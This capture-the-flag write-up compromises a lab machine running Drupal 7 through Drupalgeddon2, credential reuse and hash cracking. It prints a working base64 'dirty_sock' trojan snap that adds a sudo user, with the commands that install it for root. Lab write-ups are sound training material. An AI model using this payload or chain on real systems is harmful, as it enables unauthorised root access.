# Armageddon (Easy) ## Nmap ``` nmap -sC -sV 10.10.10.233 ``` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 01:03 EDT Nmap scan report for 10.10.10.233 Host is up (0.13s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds ``` We can see that port 80 is open From the robots.txt, we can navigate to **/CHANGELOG.txt** We can see that it is using drupal 7.56, further research we can use metasploit drupal Drupalgeddon 2 Forms API Property Injection to exploit the webapps. After that we will get a reverse shell from the metasploit Then, we need to find some valuable information. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-nGI0bf_ciCtovbRC%2F-Mb-q2hgRcJ5I0y4Lj4F%2Fimage.png?alt=media\&token=9719b3bb-7396-498e-b883-f8db77c17ffc) At last, at this folder, we can cat out the **settings.php** ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-nGI0bf_ciCtovbRC%2F-Mb-qGxSy5EvblT-rQLz%2Fimage.png?alt=media\&token=4d480b1a-96e5-4270-a3a7-4489dff1d7a0) We can see here is the database login password, lets login through mysql. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-rwevGmsRVEDNZJbe%2Fimage.png?alt=media\&token=d2784ffb-9db7-47a4-910b-7d6ae5c76f03) We can see there is a password hash of the user **brucetherealadmin**, we then can pass it to john and crack the password. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-rz247Ooel_tr2PoB%2Fimage.png?alt=media\&token=6b8dd615-e55e-4d38-ae5c-d490443c6f4e) We can now SSH to the user **brucetherealadmin**. ## Privilege Escalation ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-sBlw4LZfKZehPKDF%2Fimage.png?alt=media\&token=94807f95-e16f-4285-97c4-697a9ecc5e8d) We can see the snap can execute with sudo and can install anything. After some tries, we realized that the snap only can install local snap packages What we can do is to go to [here](https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py) and get the TROJAN SNAP code ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-y1ZCS4b1d34JMjnJ%2Fimage.png?alt=media\&token=fcb0d4ee-fdf2-498b-b6f6-c2e6aafbfd60) Then, we can use python to write the code to a file ``` python3 -c "print('''aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''+ 'A' * 4256 + '==')" > evil.snap ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yCrlYzCAaM3RLxE7%2Fimage.png?alt=media\&token=7627229a-3a68-40af-bba4-e17c7333828e) ``` cat evil.snap | base64 -d > evilReadable.snap ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yJcOgAm0Bp-9uFRI%2Fimage.png?alt=media\&token=e3c75bae-bc0e-496a-8b8a-29ec5817945c) Then we will get something like this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-ybQpjwrXp2XCkDYa%2Fimage.png?alt=media\&token=da80ef60-b547-4253-b36d-477f46537e94) We then can fire up the **python SimpleHTTPServer** and curl the file from the victim machine ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-yxI0Fsq-6zepjw4z%2Fimage.png?alt=media\&token=d0da96e2-acc3-4e79-a140-94bb7c5b4889) Then we can run ``` sudo /usr/bin/snap install evilReadable.snap --devmode ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-z5wo2woHQneG_C5q%2Fimage.png?alt=media\&token=c2cf54d4-3a07-4724-8acd-de84e88f41d5) ok **dirty sock** has been installed ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zEdeexY7G22t31LE%2Fimage.png?alt=media\&token=f464b2d7-06db-4d43-8db4-9b29f169ca54) We can see a new user `dirty_sock` has been installed. Navigate back to the code we can see this. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zO6vm4tie7kAI544%2Fimage.png?alt=media\&token=165a824e-180b-4b64-9953-7b0893aef008) we can then **su** to the user `dirty_sock` with the password `dirty_sock` Then we can use `sudo /bin/bash` to get **root**. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb-rtZ8Ya54DDfTJ_T1%2F-Mb-zjYRC3rJTMIocTZI%2Fimage.png?alt=media\&token=fc9efc24-576b-426a-a791-bbb6c8dd35c3) Congratz!